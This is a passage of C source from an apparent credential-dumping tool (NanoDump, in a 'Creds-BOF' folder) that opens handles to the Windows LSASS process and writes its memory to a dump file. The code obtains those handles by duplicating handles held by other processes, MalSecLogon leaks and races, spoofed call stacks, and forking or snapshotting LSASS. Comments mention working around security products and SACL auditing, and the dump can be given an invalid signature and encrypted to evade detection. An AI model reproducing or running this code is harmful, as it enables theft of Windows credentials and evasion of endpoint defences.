        if (!lsass_pid)
            goto cleanup;
    }
    else
    {
        DPRINT("Using %ld as the PID of " LSASS, lsass_pid);
    }

    if (!create_file(&full_dump_path))
        goto cleanup;

    success = obtain_lsass_handle(
        &hProcess,
        lsass_pid,
        FALSE,
        elevate_handle,
        FALSE,
        FALSE,
        0,
        FALSE,
        NULL,
        NULL,
        use_valid_sig,
        dump_path,
        FALSE,
        FALSE,
        NULL,
        FALSE,
        FALSE,
        FALSE);
    if (!success)
        goto cleanup;

    // set the signature
    if (use_valid_sig)
    {
        DPRINT("Using a valid signature");
        dc.Signature = MINIDUMP_SIGNATURE;
        dc.Version = MINIDUMP_VERSION;
        dc.ImplementationVersion = MINIDUMP_IMPL_VERSION;
    }
    else
    {
        DPRINT("Using a invalid signature");
        generate_invalid_sig(
            &dc.Signature,
            &dc.Version,
            &dc.ImplementationVersion);
    }

    // allocate a chuck of memory to write the dump
    region_size = DUMP_MAX_SIZE;
    base_address = allocate_memory(&region_size);
    if (!base_address)
        goto cleanup;

    dc.hProcess    = hProcess;
    dc.BaseAddress = base_address;
    dc.rva         = 0;
    dc.DumpMaxSize = region_size;

    success = NanoDumpWriteDump(&dc);
    if (!success)
        goto cleanup;

    DPRINT(
        "The dump was created successfully, final size: %d MiB",
        (dc.rva/1024)/1024);

    if (!use_valid_sig)
    {
        // at this point, you can encrypt or obfuscate the dump
        encrypt_dump(
            dc.BaseAddress,
            dc.rva);
    }

    success = write_file(
        &full_dump_path,
        dc.BaseAddress,
        dc.rva);

    if (!success)
        goto cleanup;

    ret_val = TRUE;

cleanup:
    if (dc.BaseAddress && dc.DumpMaxSize)
        erase_dump_from_memory(dc.BaseAddress, dc.DumpMaxSize);
    if (hProcess)
        NtClose(hProcess);
    if (!ret_val)
        delete_file(dump_path);
#if defined(PASS_PARAMS_VIA_NAMED_PIPES) && (PASS_PARAMS_VIA_NAMED_PIPES == 1)
    if (dump_path)
        intFree(dump_path);
    server_send_success(
        hPipe,
        ret_val);
    if (hPipe)
        server_disconnect_pipe(hPipe);
    if (hPipe)
        NtClose(hPipe);
#endif

    return ret_val;
}

__declspec(dllexport) BOOL APIENTRY DllMain(
    HINSTANCE hinstDLL,
    DWORD fdwReason,
    LPVOID lpReserved)
{
    UNUSED(hinstDLL);
    UNUSED(lpReserved);
    switch (fdwReason)
    {
        case DLL_PROCESS_ATTACH:
            NanoDumpPPLMedic();
            break;
        case DLL_THREAD_ATTACH:
            break;
        case DLL_THREAD_DETACH:
            break;
        case DLL_PROCESS_DETACH:
            break;
    }
    return TRUE;
}

#endif


================================================
FILE: Creds-BOF/nanodump/source/handle.c
================================================
#include "utils.h"
#include "handle.h"
#include "dinvoke.h"
#include "modules.h"
#include "malseclogon.h"
#include "spoof_callstack.h"

#if (defined(NANO) || defined(PPL_MEDIC)) && !defined(SSP)

BOOL find_token_handles_in_process(
    IN DWORD process_pid,
    IN DWORD permissions,
    OUT PHANDLE_LIST* phandle_list)
{
    BOOL ret_val = FALSE;
    BOOL success = FALSE;
    PSYSTEM_HANDLE_INFORMATION handleTableInformation = NULL;
    ULONG handleTableInformationSize = 0;

    DPRINT("Finding token handles in the process with PID %ld", process_pid);

    PHANDLE_LIST handle_list = intAlloc(sizeof(HANDLE_LIST));
    if (!handle_list)
    {
        malloc_failed();
        goto cleanup;
    }

    ULONG TokenTypeIndex = 0;
    success = get_type_index_by_name(TOKEN_HANDLE_TYPE, &TokenTypeIndex);
    if (!success)
        goto cleanup;

    success = get_all_handles(
        &handleTableInformation,
        &handleTableInformationSize);
    if (!success)
        goto cleanup;

    // loop over each handle
    for (ULONG j = 0; j < handleTableInformation->Count; j++)
    {
        PSYSTEM_HANDLE_TABLE_ENTRY_INFO handleInfo = (PSYSTEM_HANDLE_TABLE_ENTRY_INFO)&handleTableInformation->Handle[j];

        // make sure this handle is from the target process
        if (handleInfo->UniqueProcessId != process_pid)
            continue;

        // make sure the handle has the permissions we need
        if ((handleInfo->GrantedAccess & permissions) != permissions)
            continue;

        // make sure the handle is of type 'Token'
        if (handleInfo->ObjectTypeIndex != TokenTypeIndex)
            continue;

        if (handle_list->Count + 1 > MAX_HANDLES)
        {
            PRINT_ERR("Too many handles, please increase MAX_HANDLES");
            goto cleanup;
        }
        handle_list->Handle[handle_list->Count++] = (HANDLE)(ULONG_PTR)handleInfo->HandleValue;
    }

    *phandle_list = handle_list;
    ret_val = TRUE;
    DPRINT("Found %ld handles", handle_list->Count);

cleanup:
    if (!ret_val && handle_list)
    {
        DATA_FREE(handle_list, sizeof(HANDLE_LIST));
    }
    if (handleTableInformation)
    {
        DATA_FREE(handleTableInformation, handleTableInformationSize);
    }

    return ret_val;
}

BOOL find_process_handles_in_process(
    IN DWORD process_pid,
    IN DWORD permissions,
    OUT PHANDLE_LIST* phandle_list)
{
    BOOL ret_val = FALSE;
    BOOL success = FALSE;
    PSYSTEM_HANDLE_INFORMATION handleTableInformation = NULL;
    ULONG handleTableInformationSize = 0;

    DPRINT("Finding process handles in the process with PID %ld", process_pid);

    PHANDLE_LIST handle_list = intAlloc(sizeof(HANDLE_LIST));
    if (!handle_list)
    {
        malloc_failed();
        goto cleanup;
    }

    ULONG ProcesTypeIndex = 0;
    success = get_type_index_by_name(PROCESS_HANDLE_TYPE, &ProcesTypeIndex);
    if (!success)
        goto cleanup;

    success = get_all_handles(
        &handleTableInformation,
        &handleTableInformationSize);
    if (!success)
        goto cleanup;

    // loop over each handle
    for (ULONG j = 0; j < handleTableInformation->Count; j++)
    {
        PSYSTEM_HANDLE_TABLE_ENTRY_INFO handleInfo = (PSYSTEM_HANDLE_TABLE_ENTRY_INFO)&handleTableInformation->Handle[j];

        // make sure this handle is from the target process
        if (handleInfo->UniqueProcessId != process_pid)
            continue;

        // make sure the handle has the permissions we need
        if ((handleInfo->GrantedAccess & permissions) != permissions)
            continue;

        // make sure the handle is of type 'Process'
        if (handleInfo->ObjectTypeIndex != ProcesTypeIndex)
            continue;

        if (handle_list->Count + 1 > MAX_HANDLES)
        {
            PRINT_ERR("Too many handles, please increase MAX_HANDLES");
            goto cleanup;
        }
        handle_list->Handle[handle_list->Count++] = (HANDLE)(ULONG_PTR)handleInfo->HandleValue;
    }

    *phandle_list = handle_list;
    ret_val = TRUE;
    DPRINT("Found %ld handles", handle_list->Count);

cleanup:
    if (handleTableInformation)
    {
        DATA_FREE(handleTableInformation, handleTableInformationSize);
    }
    if (!ret_val && handle_list)
    {
        DATA_FREE(handle_list, sizeof(HANDLE_LIST));
    }

    return ret_val;
}

BOOL find_directory_handles_in_process(
    IN DWORD process_pid,
    IN DWORD permissions,
    OUT PHANDLE_LIST* phandle_list)
{
    BOOL ret_val = FALSE;
    BOOL success = FALSE;
    PSYSTEM_HANDLE_INFORMATION handleTableInformation = NULL;
    ULONG handleTableInformationSize = 0;
    ULONG DirectoryTypeIndex = 0;

    DPRINT("Finding directory handles in the process with PID %ld", process_pid);

    PHANDLE_LIST handle_list = intAlloc(sizeof(HANDLE_LIST));
    if (!handle_list)
    {
        malloc_failed();
        goto cleanup;
    }

    success = get_type_index_by_name(DIRECTORY_HANDLE_TYPE, &DirectoryTypeIndex);
    if (!success)
        goto cleanup;

    success = get_all_handles(
        &handleTableInformation,
        &handleTableInformationSize);
    if (!success)
        goto cleanup;

    // loop over each handle
    for (ULONG j = 0; j < handleTableInformation->Count; j++)
    {
        PSYSTEM_HANDLE_TABLE_ENTRY_INFO handleInfo = (PSYSTEM_HANDLE_TABLE_ENTRY_INFO)&handleTableInformation->Handle[j];

        // make sure this handle is from the target process
        if (handleInfo->UniqueProcessId != process_pid)
            continue;

        // make sure the handle has the permissions we need
        if ((handleInfo->GrantedAccess & permissions) != permissions)
            continue;

        // make sure the handle is of type 'Directory'
        if (handleInfo->ObjectTypeIndex != DirectoryTypeIndex)
            continue;

        if (handle_list->Count + 1 > MAX_HANDLES)
        {
            PRINT_ERR("Too many handles, please increase MAX_HANDLES");
            goto cleanup;
        }
        handle_list->Handle[handle_list->Count++] = (HANDLE)(ULONG_PTR)handleInfo->HandleValue;
    }

    *phandle_list = handle_list;
    ret_val = TRUE;
    DPRINT("Found %ld handles", handle_list->Count);

cleanup:
    if (handleTableInformation)
    {
        DATA_FREE(handleTableInformation, handleTableInformationSize);
    }
    if (!ret_val && handle_list)
    {
        DATA_FREE(handle_list, sizeof(HANDLE_LIST));
    }

    return ret_val;
}

/*
 * Some security products remove permissions from handles
 * such as PROCESS_VM_READ. Make sure the handle has all
 * the permissions that we requested
 */
BOOL check_handle_privs(
    IN HANDLE handle,
    IN DWORD permissions)
{
    BOOL ret_val = FALSE;
    NTSTATUS status = STATUS_UNSUCCESSFUL;
    PUBLIC_OBJECT_BASIC_INFORMATION obj_info = { 0 };

    status = NtQueryObject_(
        handle,
        ObjectBasicInformation,
        &obj_info,
        sizeof(PUBLIC_OBJECT_BASIC_INFORMATION),
        NULL);
    if (!NT_SUCCESS(status))
    {
        syscall_failed("NtQueryObject", status);
        goto cleanup;
    }

    if ((obj_info.GrantedAccess & permissions) == permissions)
    {
        ret_val = TRUE;
        DPRINT(
            "The handle has the appropiate permissions: 0x%lx",
            obj_info.GrantedAccess);
    }
    else
    {
        ret_val = FALSE;
        DPRINT_ERR(
            "The handle should have access permissions of 0x%lx but has 0x%lx",
            permissions,
            permissions & obj_info.GrantedAccess);
        PRINT_ERR("Could not open a handle with the requested permissions");
    }

cleanup:
    return ret_val;
}


/*
 * "The DuplicateHandle system call has an interesting behaviour
 * when using the pseudo current process handle, which has the value -1.
 * Specifically if you try and duplicate the pseudo handle from another
 * process you get back a full access handle to the source process."
 * https://www.tiraniddo.dev/2017/10/bypassing-sacl-auditing-on-lsass.html
 */
HANDLE make_handle_full_access(
    IN HANDLE hProcess,
    IN DWORD attributes)
{
    if (!hProcess)
        return NULL;

    HANDLE hDuped = NULL;
    NTSTATUS status = NtDuplicateObject(
        hProcess,
        (HANDLE)-1,
        NtCurrentProcess(),
        &hDuped,
        0,
        attributes,
        DUPLICATE_SAME_ACCESS);

    NtClose(hProcess); hProcess = NULL;

    if (!NT_SUCCESS(status))
    {
        syscall_failed("NtDuplicateObject", status);
        return NULL;
    }

    return hDuped;
}

// https://codewhitesec.blogspot.com/2022/09/attacks-on-sysmon-revisited-sysmonente.html
HANDLE elevate_handle_via_duplicate(
    IN HANDLE hProcess,
    IN ACCESS_MASK DesiredAccess,
    IN DWORD HandleAttributes)
{
    HANDLE hDupPriv = NULL;
    HANDLE hHighPriv = NULL;
    NTSTATUS status = STATUS_UNSUCCESSFUL;
    ULONG options = 0;

    if (!hProcess)
        goto cleanup;

    if (!DesiredAccess)
        options = DUPLICATE_SAME_ACCESS;

    status = NtDuplicateObject(
        NtCurrentProcess(),
        hProcess,
        NtCurrentProcess(),
        &hDupPriv,
        PROCESS_DUP_HANDLE,
        FALSE,
        0);
    if (!NT_SUCCESS(status))
    {
        syscall_failed("NtDuplicateObject", status);
        goto cleanup;
    }

    status = NtDuplicateObject(
        hDupPriv,
        NtCurrentProcess(),
        NtCurrentProcess(),
        &hHighPriv,
        DesiredAccess,
        HandleAttributes,
        options);
    if (!NT_SUCCESS(status))
    {
        syscall_failed("NtDuplicateObject", status);
        goto cleanup;
    }

    DPRINT(
        "Duplicated handle: 0x%lx -> 0x%lx",
        (DWORD)(ULONG_PTR)hProcess,
        (DWORD)(ULONG_PTR)hHighPriv);

cleanup:
    if (hProcess)
        NtClose(hProcess);
    if (hDupPriv)
        NtClose(hDupPriv);

    return hHighPriv;
}

#if defined(NANO)

// get the minimum permissions required to read LSASS
DWORD get_lsass_min_permissions(VOID)
{
    PVOID pPeb;
    PULONG32 OSMajorVersion;
    pPeb = (PVOID)READ_MEMLOC(PEB_OFFSET);
    OSMajorVersion = RVA(PULONG32, pPeb, OSMAJORVERSION_OFFSET);
    // NOTE: mimikatz uses < instead of <= but this doesn't seem to work in Windows Server 2008 R2
    return PROCESS_VM_READ | ((*OSMajorVersion <= 6) ? PROCESS_QUERY_INFORMATION : PROCESS_QUERY_LIMITED_INFORMATION);
}

// get the minimum permissions required to clone LSASS
DWORD get_lsass_clone_permissions(VOID)
{
    PVOID pPeb;
    PULONG32 OSMajorVersion;
    pPeb = (PVOID)READ_MEMLOC(PEB_OFFSET);
    OSMajorVersion = RVA(PULONG32, pPeb, OSMAJORVERSION_OFFSET);
    return PROCESS_CREATE_PROCESS | ((*OSMajorVersion <= 6) ? PROCESS_QUERY_INFORMATION : PROCESS_QUERY_LIMITED_INFORMATION);
}

// get the minimum permissions required to dump LSASS via shtinkering
DWORD get_lsass_shtinkering_permissions(VOID)
{
    PVOID pPeb;
    PULONG32 OSMajorVersion;
    pPeb = (PVOID)READ_MEMLOC(PEB_OFFSET);
    OSMajorVersion = RVA(PULONG32, pPeb, OSMAJORVERSION_OFFSET);
    // NOTE: mimikatz uses < instead of <= but this doesn't seem to work in Windows Server 2008 R2
    return PROCESS_VM_READ | ((*OSMajorVersion <= 6) ? PROCESS_QUERY_INFORMATION : PROCESS_QUERY_LIMITED_INFORMATION);
}

// get a handle to LSASS via multiple methods
BOOL obtain_lsass_handle(
    OUT PHANDLE phProcess,
    IN DWORD lsass_pid,
    IN BOOL duplicate_handle,
    IN BOOL elevate_handle,
    IN BOOL duplicate_elevate,
    IN BOOL use_seclogon_duplicate,
    IN BOOL spoof_callstack,
    IN BOOL is_seclogon_leak_local_stage_2,
    IN LPCSTR seclogon_leak_remote_binary,
    OUT PPROCESS_LIST* Pcreated_processes,
    IN BOOL use_valid_sig,
    IN LPCSTR dump_path,
    IN BOOL fork_lsass,
    IN BOOL snapshot_lsass,
    OUT PHANDLE PhSnapshot,
    IN BOOL use_seclogon_leak_local,
    IN BOOL use_seclogon_leak_remote,
    IN BOOL use_lsass_shtinkering)
{
    BOOL   ret_val               = FALSE;
    BOOL   success               = FALSE;
    HANDLE hProcess              = NULL;
    DWORD  permissions           = get_lsass_min_permissions();
    DWORD  duplicate_permissions = 0;
    DWORD  attributes            = 0;
    BOOL   use_seclogon_leak     = use_seclogon_leak_local || use_seclogon_leak_remote;

    if (!phProcess)
        return FALSE;

    // --duplicate-elevate is simply --duplicate and --elevate-handle used together
    if (duplicate_elevate)
    {
        elevate_handle = TRUE;
        duplicate_handle = TRUE;
    }

    if (use_seclogon_leak && !is_seclogon_leak_local_stage_2)
    {
#if !defined(PPL_DUMP) && !defined(PPL_MEDIC)
        success = malseclogon_handle_leak(
            seclogon_leak_remote_binary,
            dump_path,
            fork_lsass,
            snapshot_lsass,
            use_valid_sig,
            use_lsass_shtinkering,
            use_seclogon_leak_local,
            lsass_pid,
            Pcreated_processes);
        if (!success)
            goto cleanup;
        if (use_seclogon_leak_local)
            return TRUE;
#endif
    }

    // --seclogon-leak-remote requires --duplicate internaly
    if (use_seclogon_leak_remote)
        duplicate_handle = TRUE;

    // LSASS Shtinkering needs the handle to be inheritable
    if (use_lsass_shtinkering)
        attributes |= OBJ_INHERIT;

    // fork and snapshot require special permissions
    if ((fork_lsass || snapshot_lsass) && !use_seclogon_leak)
    {
        permissions = get_lsass_clone_permissions();
    }

    // shtinkering requires special permissions
    else if (use_lsass_shtinkering)
    {
        permissions = get_lsass_shtinkering_permissions();
    }

    // remember the permissions we needed
    duplicate_permissions = permissions;

    // if --elevate-handle was provided, we use PROCESS_QUERY_LIMITED_INFORMATION
    if (elevate_handle)
    {
        permissions = PROCESS_QUERY_LIMITED_INFORMATION;
    }

    hProcess = open_handle_to_lsass(
        lsass_pid,
        permissions,
        duplicate_handle,
        use_seclogon_duplicate,
        spoof_callstack,
        is_seclogon_leak_local_stage_2,
        attributes);
    if (!hProcess)
        goto cleanup;

    success = check_handle_privs(hProcess, permissions);
    if (!success)
        goto cleanup;

    if (elevate_handle)
    {
        hProcess = elevate_handle_via_duplicate(
            hProcess,
            duplicate_permissions,
            attributes);
        if (!hProcess)
            goto cleanup;

        success = check_handle_privs(hProcess, duplicate_permissions);
        if (!success)
            goto cleanup;
    }
    else if ((fork_lsass || snapshot_lsass || use_lsass_shtinkering)
            && use_seclogon_leak)
    {
        hProcess = make_handle_full_access(
            hProcess,
            attributes);
        if (!hProcess)
            goto cleanup;

        success = check_handle_privs(hProcess, duplicate_permissions);
        if (!success)
            goto cleanup;
    }

    // avoid reading LSASS directly by making a fork
    if (fork_lsass)
    {
        hProcess = fork_process(
            hProcess,
            attributes);
        if (!hProcess)
            goto cleanup;
    }

    // avoid reading LSASS directly by making a snapshot
    if (snapshot_lsass)
    {
        hProcess = snapshot_process(
            hProcess,
            PhSnapshot);
        if (!hProcess)
            goto cleanup;
    }

    ret_val = TRUE;

    *phProcess = hProcess;

cleanup:
    if (!ret_val && hProcess)
        NtClose(hProcess);

    return ret_val;
}


HANDLE open_handle_to_lsass(
    IN DWORD lsass_pid,
    IN DWORD permissions,
    IN BOOL dup,
    IN BOOL seclogon_race,
    IN BOOL spoof_callstack,
    IN BOOL is_malseclogon_stage_2,
    IN DWORD attributes)
{
    HANDLE hProcess = NULL;
    // use MalSecLogon to leak a handle to LSASS
    if (is_malseclogon_stage_2)
    {
        // this is always done from an EXE
#if defined(EXE) && defined(NANO) && !defined(SSP) && !defined(PPL_DUMP) && !defined(PPL_MEDIC)
        hProcess = malseclogon_stage_2();
#endif
    }
    // duplicate an existing handle to LSASS
    else if (dup)
    {
        DPRINT("Trying to find an existing " LSASS " handle to duplicate");
        hProcess = duplicate_lsass_handle(
            lsass_pid,
            permissions,
            attributes);
    }
    else if (seclogon_race)
    {
#if defined(NANO) && !defined(SSP) && !defined(PPL_DUMP) && !defined(PPL_MEDIC)
        hProcess = malseclogon_race_condition(
            lsass_pid,
            permissions,
            attributes);
#endif
    }
    else if (spoof_callstack)
    {
#if !defined(PPL_DUMP) && !defined(PPL_MEDIC)
        hProcess = open_handle_with_spoofed_callstack(
            lsass_pid,
            permissions,
            attributes);
#endif
    }
    // good old NtOpenProcess
    else if (lsass_pid)
    {
        DPRINT("Using NtOpenProcess to get a handle to " LSASS);
        hProcess = get_process_handle(
            lsass_pid,
            permissions,
            FALSE,
            attributes);
    }
    // use NtGetNextProcess until a handle to LSASS is obtained
    else
    {
        // the variable lsass_pid should always be set
        // this branch won't be called
        DPRINT("Using NtGetNextProcess to get a handle to " LSASS);
        hProcess = find_lsass(
            permissions,
            attributes);
    }
    if (hProcess)
    {
        DPRINT(LSASS " handle: 0x%lx", (DWORD)(ULONG_PTR)hProcess);
    }
    return hProcess;
}

// use NtGetNextProcess to get a handle to LSASS
HANDLE find_lsass(
    IN DWORD dwFlags,
    IN DWORD attributes)
{
    HANDLE hProcess = NULL;
    NTSTATUS status;

    while (TRUE)
    {
        status = NtGetNextProcess(
            hProcess,
            dwFlags,
            attributes,
            0,
            &hProcess);
        if (status == STATUS_NO_MORE_ENTRIES)
        {
            PRINT_ERR("The " LSASS " process was not found. Try providing the PID with -p or --pid");
            return NULL;
        }
        if (!NT_SUCCESS(status))
        {
            syscall_failed("NtGetNextProcess", status);
            DPRINT_ERR("Could not find the " LSASS " process");
            return NULL;
        }
        if (is_lsass(hProcess))
            return hProcess;
    }
}

#endif

// use NtOpenProcess to get a handle to a process
HANDLE get_process_handle(
    IN DWORD dwPid,
    IN DWORD dwFlags,
    IN BOOL quiet,
    IN DWORD attributes)
{
    NTSTATUS status;
    HANDLE hProcess = NULL;
    OBJECT_ATTRIBUTES ObjectAttributes;

    InitializeObjectAttributes(
        &ObjectAttributes,
        NULL,
        attributes,
        NULL,
        NULL);
    CLIENT_ID uPid = { 0 };

    uPid.UniqueProcess = (HANDLE)(DWORD_PTR)dwPid;
    uPid.UniqueThread = (HANDLE)0;

    status = NtOpenProcess(
        &hProcess,
        dwFlags,
        &ObjectAttributes,
        &uPid);

    if (status == STATUS_INVALID_CID)
    {
        if (!quiet)
        {
            PRINT_ERR(
                "There is no process with the PID %ld.",
                dwPid);
        }
        return NULL;
    }
    if (status == STATUS_ACCESS_DENIED)
    {
        if (!quiet)
        {
            PRINT_ERR(
                "Could not open a handle to %ld.",
                dwPid);
        }
        return NULL;
    }
    else if (!NT_SUCCESS(status))
    {
        syscall_failed("NtOpenProcess", status);
        DPRINT_ERR("Could not open handle to process %ld", dwPid);
        return NULL;
    }

    return hProcess;
}

// get all handles in the system
BOOL get_all_handles(
    OUT PSYSTEM_HANDLE_INFORMATION* phandle_table,
    OUT PULONG phandle_table_size)
{
    BOOL ret_val = FALSE;
    NTSTATUS status = STATUS_UNSUCCESSFUL;
    ULONG buffer_size = sizeof(SYSTEM_HANDLE_INFORMATION);
    ULONG prev_buffer_size = buffer_size;
    PVOID handleTableInformation = NULL;

    handleTableInformation = intAlloc(buffer_size);
    if (!handleTableInformation)
    {
        malloc_failed();
        goto cleanup;
    }

    while (TRUE)
    {
        //get information of all the existing handles
        status = NtQuerySystemInformation(
            SystemHandleInformation,
            handleTableInformation,
            buffer_size,
            &buffer_size);
        if (status == STATUS_INFO_LENGTH_MISMATCH)
        {
            // the buffer was too small, buffer_size now has the new length
            DATA_FREE(handleTableInformation, prev_buffer_size);
            prev_buffer_size = buffer_size;
            handleTableInformation = intAlloc(buffer_size);
            if (!handleTableInformation)
            {
                malloc_failed();
                goto cleanup;
            }
            continue;
        }
        if (!NT_SUCCESS(status))
        {
            syscall_failed("NtQuerySystemInformation", status);
            goto cleanup;
        }
        break;
    }

    *phandle_table = (PSYSTEM_HANDLE_INFORMATION)handleTableInformation;
    *phandle_table_size = buffer_size;
    ret_val = TRUE;
    DPRINT("Obtained the handle table");

cleanup:
    if (!ret_val && handleTableInformation)
    {
        DATA_FREE(handleTableInformation, buffer_size);
    }

    return ret_val;
}

// check if a PID is included in the process list
BOOL process_is_included(
    IN PPROCESS_LIST process_list,
    IN ULONG ProcessId)
{
    for (ULONG i = 0; i < process_list->Count; i++)
    {
        if (process_list->ProcessId[i] == ProcessId)
            return TRUE;
    }
    return FALSE;
}

// obtain a list of PIDs from a handle table
BOOL get_processes_from_handle_table(
    IN PSYSTEM_HANDLE_INFORMATION handleTableInformation,
    OUT PPROCESS_LIST* pprocess_list)
{
    BOOL ret_val = FALSE;
    PPROCESS_LIST process_list = NULL;

    process_list = intAlloc(sizeof(PROCESS_LIST));
    if (!process_list)
    {
        malloc_failed();
        goto cleanup;
    }

    PSYSTEM_HANDLE_TABLE_ENTRY_INFO handleInfo;
    for (ULONG i = 0; i < handleTableInformation->Count; i++)
    {
        handleInfo = (PSYSTEM_HANDLE_TABLE_ENTRY_INFO)&handleTableInformation->Handle[i];

        if (!process_is_included(process_list, handleInfo->UniqueProcessId))
        {
            if (process_list->Count + 1 > MAX_PROCESSES)
            {
                PRINT_ERR("Too many processes, please increase MAX_PROCESSES");
                goto cleanup;
            }
            process_list->ProcessId[process_list->Count++] = handleInfo->UniqueProcessId;
        }
    }

    *pprocess_list = process_list;
    ret_val = TRUE;

    DPRINT(
        "Enumerated %ld handles from %ld processes",
        handleTableInformation->Count,
        process_list->Count);

cleanup:
    if (!ret_val && process_list)
    {
        DATA_FREE(process_list, sizeof(PROCESS_LIST));
    }

    return ret_val;
}

// call NtQueryObject with ObjectTypesInformation
BOOL query_object_types_info(
    POBJECT_TYPES_INFORMATION* pObjectTypes,
    PULONG pObjectTypesSize)
{
    NTSTATUS status = STATUS_UNSUCCESSFUL;
    ULONG BufferLength = 0x1000;
    ULONG PrevBufferLength = BufferLength;
    POBJECT_TYPES_INFORMATION obj_type_information = NULL;

    do
    {
        PrevBufferLength = BufferLength;
        obj_type_information = intAlloc(BufferLength);
        if (!obj_type_information)
        {
            malloc_failed();
            return FALSE;
        }

        status = NtQueryObject_(
            NULL,
            ObjectTypesInformation,
            obj_type_information,
            BufferLength,
            &BufferLength);

        if (NT_SUCCESS(status))
        {
            *pObjectTypes = obj_type_information;
            *pObjectTypesSize = BufferLength;
            return TRUE;
        }

        DATA_FREE(obj_type_information, PrevBufferLength);
    } while (status == STATUS_INFO_LENGTH_MISMATCH);

    syscall_failed("NtQueryObject", status);
    return FALSE;
}

// get index of object type 'Process'
BOOL get_type_index_by_name(
    IN LPWSTR handle_type,
    OUT PULONG ProcesTypeIndex)
{
    BOOL ret_val = FALSE;
    BOOL success = FALSE;
    POBJECT_TYPES_INFORMATION ObjectTypes = NULL;
    POBJECT_TYPE_INFORMATION_V2 CurrentType = NULL;
    ULONG ObjectTypesSize = 0;

    success = query_object_types_info(
        &ObjectTypes,
        &ObjectTypesSize);
    if (!success)
        goto cleanup;

    CurrentType = (POBJECT_TYPE_INFORMATION_V2)OBJECT_TYPES_FIRST_ENTRY(ObjectTypes);
    for (ULONG i = 0; i < ObjectTypes->NumberOfTypes; i++)
    {
        if (!_wcsicmp(CurrentType->TypeName.Buffer, handle_type))
        {
            *ProcesTypeIndex = i + 2;
            ret_val = TRUE;
            DPRINT("Found the index of type '%ls': %ld", handle_type, i + 2);
            goto cleanup;
        }
        CurrentType = (POBJECT_TYPE_INFORMATION_V2)OBJECT_TYPES_NEXT_ENTRY(CurrentType);
    }

    DPRINT_ERR("Index of type '%ls' not found", handle_type);

cleanup:
    if (ObjectTypes)
    {
        DATA_FREE(ObjectTypes, ObjectTypesSize);
    }

    return ret_val;
}

#if defined(NANO)

// find and duplicate a handle to LSASS
HANDLE duplicate_lsass_handle(
    IN DWORD lsass_pid,
    IN DWORD permissions,
    IN DWORD attributes)
{
    BOOL ret_val = FALSE;
    NTSTATUS status = STATUS_UNSUCCESSFUL;
    BOOL success = FALSE;
    HANDLE duplicated_handle = NULL;
    HANDLE hProcess = NULL;
    HANDLE hDuped = NULL;
    PSYSTEM_HANDLE_INFORMATION handleTableInformation = NULL;
    ULONG handleTableInformationSize = 0;
    PPROCESS_LIST process_list = NULL;
    ULONG ProcessId = 0;
    DWORD local_pid = 0;
    ULONG ProcesTypeIndex = 0;

    success = get_type_index_by_name(PROCESS_HANDLE_TYPE, &ProcesTypeIndex);
    if (!success)
        goto cleanup;

    success = get_all_handles(
        &handleTableInformation,
        &handleTableInformationSize);
    if (!success)
        goto cleanup;

    success = get_processes_from_handle_table(
        handleTableInformation,
        &process_list);
    if (!success)
        goto cleanup;

    local_pid = (DWORD)READ_MEMLOC(CID_OFFSET);

    // loop over each ProcessId
    for (ULONG i = 0; !ret_val && i < process_list->Count; i++)
    {
        ProcessId = process_list->ProcessId[i];

        if (ProcessId == local_pid)
            continue;
        if (ProcessId == lsass_pid)
            continue;
        if (ProcessId == 0)
            continue;
        if (ProcessId == 4)
            continue;

        // we will open a handle to this ProcessId later on
        hProcess = NULL;

        // loop over each handle of this ProcessId
        for (ULONG j = 0; j < handleTableInformation->Count; j++)
        {
            PSYSTEM_HANDLE_TABLE_ENTRY_INFO handleInfo = (PSYSTEM_HANDLE_TABLE_ENTRY_INFO)&handleTableInformation->Handle[j];

            // make sure this handle is from the current ProcessId
            if (handleInfo->UniqueProcessId != ProcessId)
                continue;

            // make sure the handle is of type 'Process'
            if (handleInfo->ObjectTypeIndex != ProcesTypeIndex)
                continue;

            // make sure the handle has the permissions we need
            if ((handleInfo->GrantedAccess & (permissions)) != (permissions))
                continue;

            if (!hProcess)
            {
                // open a handle to the process with PROCESS_DUP_HANDLE
                hProcess = get_process_handle(
                    ProcessId,
                    PROCESS_DUP_HANDLE,
                    TRUE,
                    0);
                if (!hProcess)
                    break;
            }

            // duplicate the handle
            hDuped = NULL;
            status = NtDuplicateObject(
                hProcess,
                (HANDLE)(DWORD_PTR)handleInfo->HandleValue,
                NtCurrentProcess(),
                &hDuped,
                0,
                attributes,
                DUPLICATE_SAME_ACCESS);
            if (!NT_SUCCESS(status))
                continue;

            if (is_lsass(hDuped))
            {
                // found LSASS handle
                DPRINT(
                    "Found " LSASS " handle: 0x%x, on process: %d",
                    handleInfo->HandleValue,
                    handleInfo->UniqueProcessId);
                ret_val = TRUE;
                duplicated_handle = hDuped;
                break;
            }
            NtClose(hDuped); hDuped = NULL;
        }
        if (hProcess)
        {
            NtClose(hProcess); hProcess = NULL;
        }
    }

    if (!ret_val)
    {
        PRINT_ERR("No handle to the " LSASS " process was found");
    }

cleanup:
    if (handleTableInformation)
    {
        DATA_FREE(handleTableInformation, handleTableInformationSize);
    }
    if (process_list)
    {
        DATA_FREE(process_list, sizeof(PROCESS_LIST));
    }
    if (hProcess)
        NtClose(hProcess);

    if (ret_val)
        return duplicated_handle;
    else
        return NULL;
}

#endif

// create a clone (fork) of the LSASS process
HANDLE fork_process(
    IN HANDLE hProcess,
    IN DWORD attributes)
{
    if (!hProcess)
        return NULL;

    // fork the LSASS process
    HANDLE hCloneProcess = NULL;
    OBJECT_ATTRIBUTES attrs = { 0 };
    NTSTATUS status = STATUS_UNSUCCESSFUL;

    InitializeObjectAttributes(&attrs, NULL, attributes, 0, NULL);

    status = NtCreateProcessEx(
        &hCloneProcess,
        GENERIC_ALL,
        &attrs,
        hProcess,
        CREATE_SUSPENDED,
        NULL,
        NULL,
        NULL,
        0);
    if (!NT_SUCCESS(status))
    {
        syscall_failed("NtCreateProcessEx", status);
        hCloneProcess = NULL;
    }
    else
    {
        DPRINT(
            "Forked the " LSASS " process, new handle: 0x%lx",
            (DWORD)(ULONG_PTR)hCloneProcess);
    }

    NtClose(hProcess); hProcess = NULL;
    return hCloneProcess;
}

// create a snapshot of the LSASS process
HANDLE snapshot_process(
    IN HANDLE hProcess,
    OUT PHANDLE hSnapshot)
{
    BOOL ret_val = FALSE;
    PssNtCaptureSnapshot_t PssNtCaptureSnapshot;
    PssNtQuerySnapshot_t PssNtQuerySnapshot;
    HANDLE hCloneProcess = NULL;
    DWORD process_flags = 0;
    DWORD thread_flags = 0;
    DWORD error_code = 0;

    if (!hProcess || !hSnapshot)
        goto cleanup;

    // find the address of PssNtCaptureSnapshot dynamically
